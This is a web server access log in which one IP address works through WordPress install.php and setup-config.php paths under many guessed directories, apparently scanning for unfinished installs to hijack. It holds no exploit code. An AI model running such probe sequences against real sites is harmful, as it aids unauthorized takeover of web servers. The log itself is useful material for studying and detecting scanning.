13.229.78.155 - - [01/Apr/2025:22:06:42 -0400] "GET /wp-admin/install.php?step=1 HTTP/1.1" 200 523 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:22:06:46 -0400] "GET /wp-admin/setup-config.php HTTP/1.1" 409 1222 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
198.54.114.83 - - [01/Apr/2025:22:06:47 -0400] "POST /wp-cron.php?doing_wp_cron=1743559607.1244850158691406250000 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://bakingsecurityin.com"
13.229.78.155 - - [01/Apr/2025:22:06:46 -0400] "GET /new/wp-admin/install.php?step=1 HTTP/1.1" 404 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:22:06:48 -0400] "GET /new/wp-admin/setup-config.php HTTP/1.1" 404 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:22:06:48 -0400] "GET /blog/wp-admin/install.php?step=1 HTTP/1.1" 404 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:22:06:49 -0400] "GET /blog/wp-admin/setup-config.php HTTP/1.1" 404 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:22:06:50 -0400] "GET /blogs/wp-admin/install.php?step=1 HTTP/1.1" 404 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:22:06:50 -0400] "GET /blogs/wp-admin/setup-config.php HTTP/1.1" 404 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:22:06:51 -0400] "GET /demo/wp-admin/install.php?step=1 HTTP/1.1" 404 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:22:06:52 -0400] "GET /demo/wp-admin/setup-config.php HTTP/1.1" 404 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:22:06:52 -0400] "GET /wp/wp-admin/install.php?step=1 HTTP/1.1" 404 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:22:06:55 -0400] "GET /wp/wp-admin/setup-config.php HTTP/1.1" 404 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:22:06:59 -0400] "GET /wordpress/wp-admin/install.php?step=1 HTTP/1.1" 404 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:22:07:02 -0400] "GET /wordpress/wp-admin/setup-config.php HTTP/1.1" 404 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:22:07:04 -0400] "GET /tes/wp-admin/install.php?step=1 HTTP/1.1" 404 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:22:07:07 -0400] "GET /tes/wp-admin/setup-config.php HTTP/1.1" 404 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:22:07:07 -0400] "GET /test/wp-admin/install.php?step=1 HTTP/1.1" 404 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
